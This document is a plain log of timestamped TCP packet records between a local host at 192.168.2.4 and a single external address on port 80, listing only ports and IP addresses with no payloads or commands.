Dec 15, 2024 04:17:32.133882046 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:32.740158081 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:32.794930935 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:32.981893063 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.029270887 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.173712969 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.216799974 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.294414043 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.295200109 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.327447891 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.414627075 CET	80	49749	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.414940119 CET	49749	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.415009975 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.415241003 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.415373087 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.447263956 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.447535038 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.453178883 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.535154104 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.573036909 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.763727903 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.810775995 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:33.883635044 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.883691072 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.883735895 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.930778980 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:33.931103945 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.500662088 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.535636902 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.544877052 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.576158047 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.741934061 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.745031118 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.782008886 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.782237053 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.794882059 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.865737915 CET	80	49751	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.865818977 CET	49751	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.873321056 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.873859882 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.993603945 CET	80	49750	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.993693113 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:34.993791103 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.993907928 CET	49750	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:34.993947983 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:35.113809109 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:35.341864109 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:35.462333918 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:35.462380886 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:35.462409973 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:36.079461098 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:36.122895956 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.333264112 CET	80	49753	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:36.388720989 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.448599100 CET	49745	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.448749065 CET	49753	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.455661058 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.575614929 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:36.575779915 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.575905085 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:36.695761919 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:36.920142889 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:37.040369034 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:37.040410042 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:37.040438890 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:37.661119938 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:37.716888905 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:37.924001932 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:37.966773987 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.043163061 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.045722961 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.163614035 CET	80	49755	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:38.163800001 CET	49755	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.165513992 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:38.165611029 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.165761948 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.285871029 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:38.513606071 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:38.633747101 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:38.633794069 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:38.633821011 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.263427019 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.310415030 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.503571033 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.504018068 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.624675035 CET	80	49756	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.624775887 CET	49756	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.684464931 CET	49758	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.751626968 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.805003881 CET	80	49758	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.805099964 CET	49758	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.871701002 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.871850967 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.872019053 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.874645948 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:39.991990089 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.994488001 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:39.998239040 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:40.014163017 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:40.135481119 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:40.218610048 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:40.338716984 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:40.338758945 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:40.377089024 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:40.497028112 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:40.497092962 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:40.497124910 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.002309084 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.044913054 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.149137020 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.201011896 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.251815081 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.294882059 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.399036884 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.451009989 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.526669025 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.526696920 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.527664900 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.647109985 CET	80	49759	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.647224903 CET	49759	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.647387028 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.647495985 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.647562981 CET	80	49760	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.647643089 CET	49760	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.647752047 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:41.767482042 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:41.997998953 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:42.118000984 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:42.118055105 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:42.118084908 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:42.733755112 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:42.779211998 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:42.967952013 CET	80	49761	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:43.013591051 CET	49761	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:43.147330046 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:43.267409086 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:43.267491102 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:43.267647982 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:43.387432098 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:43.622973919 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:43.743295908 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:43.743379116 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:43.743411064 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:44.366889000 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:44.419770956 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.604960918 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:44.654284000 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.728300095 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.728980064 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.849138021 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:44.849196911 CET	80	49762	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:44.849399090 CET	49762	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.849395990 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.849709988 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:44.969624043 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:45.201276064 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:45.322031975 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:45.322078943 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:45.322117090 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:45.935162067 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:45.982242107 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.184825897 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.232373953 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.264635086 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.265774965 CET	49764	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.313218117 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.384980917 CET	80	49763	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.385176897 CET	49763	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.385768890 CET	80	49764	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.386042118 CET	49764	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.433563948 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.433921099 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.434150934 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.554047108 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.779474974 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:46.900707960 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.900755882 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:46.900785923 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:47.520646095 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:47.576018095 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:47.763298988 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:47.810501099 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:47.891297102 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:47.892436028 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:48.012068987 CET	80	49765	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:48.012269020 CET	49765	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:48.013849974 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:48.014189005 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:48.014309883 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:48.135212898 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:48.373435974 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:48.493958950 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:48.494009018 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:48.494040966 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.102054119 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.154282093 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.352139950 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.404587984 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.484615088 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.485483885 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.605537891 CET	80	49766	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.605592966 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.605912924 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.606009007 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.606040001 CET	49766	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:49.726283073 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:49.951462984 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:50.072053909 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:50.072108984 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:50.072140932 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:50.692832947 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:50.732387066 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:50.948652983 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:50.998035908 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.073287964 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.074764013 CET	49768	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.193994999 CET	80	49767	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.194075108 CET	49767	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.194928885 CET	80	49768	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.195153952 CET	49768	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.195297956 CET	49768	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.315263987 CET	80	49768	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.340069056 CET	49768	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.341043949 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.461203098 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.461383104 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.461632967 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.465090036 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.503001928 CET	80	49768	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.581845045 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.585268021 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.585637093 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.585724115 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.705712080 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.810861111 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:51.931165934 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.931216955 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:51.935749054 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:52.057756901 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.057801008 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.057828903 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.087028980 CET	80	49768	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.090224028 CET	49768	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:52.571393013 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.623027086 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:52.676433086 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.732311964 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:52.821367025 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.873028040 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:52.944699049 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:52.998090982 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.083750963 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.083832026 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.084564924 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.204185963 CET	80	49770	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.204313040 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.204391956 CET	49770	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.204418898 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.204611063 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.204648018 CET	80	49769	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.204725027 CET	49769	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.324445963 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.560668945 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:53.681087971 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.681134939 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:53.681163073 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:54.290401936 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:54.341959953 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:54.534948111 CET	80	49771	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:54.576291084 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:54.652020931 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:54.772018909 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:54.772149086 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:54.772380114 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:54.892590046 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:55.146585941 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:55.266829967 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:55.266869068 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:55.266901016 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:55.857877970 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:55.904141903 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.091056108 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.138622999 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.214488029 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.215250015 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.334817886 CET	80	49772	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.335166931 CET	49772	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.335462093 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.335807085 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.335892916 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.455908060 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.685735941 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:56.806036949 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.806077003 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:56.806113005 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:57.420438051 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:57.466694117 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:57.666733980 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:57.716653109 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:57.858416080 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:57.870551109 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:57.904151917 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:57.990431070 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:57.990643024 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.003993988 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.123790026 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.183495045 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.303379059 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.303451061 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.303647995 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.357353926 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.423377991 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.477235079 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.477472067 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.654325962 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:58.774317980 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.774358988 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:58.774395943 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.078721046 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.122934103 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.340574026 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.347641945 CET	49771	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.388562918 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.389596939 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.435408115 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.629169941 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.669810057 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.743278027 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.743278027 CET	49773	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.743304968 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.744080067 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.863467932 CET	80	49776	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.863549948 CET	49776	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.863809109 CET	80	49783	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.863902092 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.864044905 CET	49783	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.864780903 CET	80	49775	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.864877939 CET	49775	80	192.168.2.4	172.67.185.214
Dec 15, 2024 04:17:59.864921093 CET	80	49773	172.67.185.214	192.168.2.4
Dec 15, 2024 04:17:59.865022898 CET	49773	80	192.168.2.4	172.67.185.214
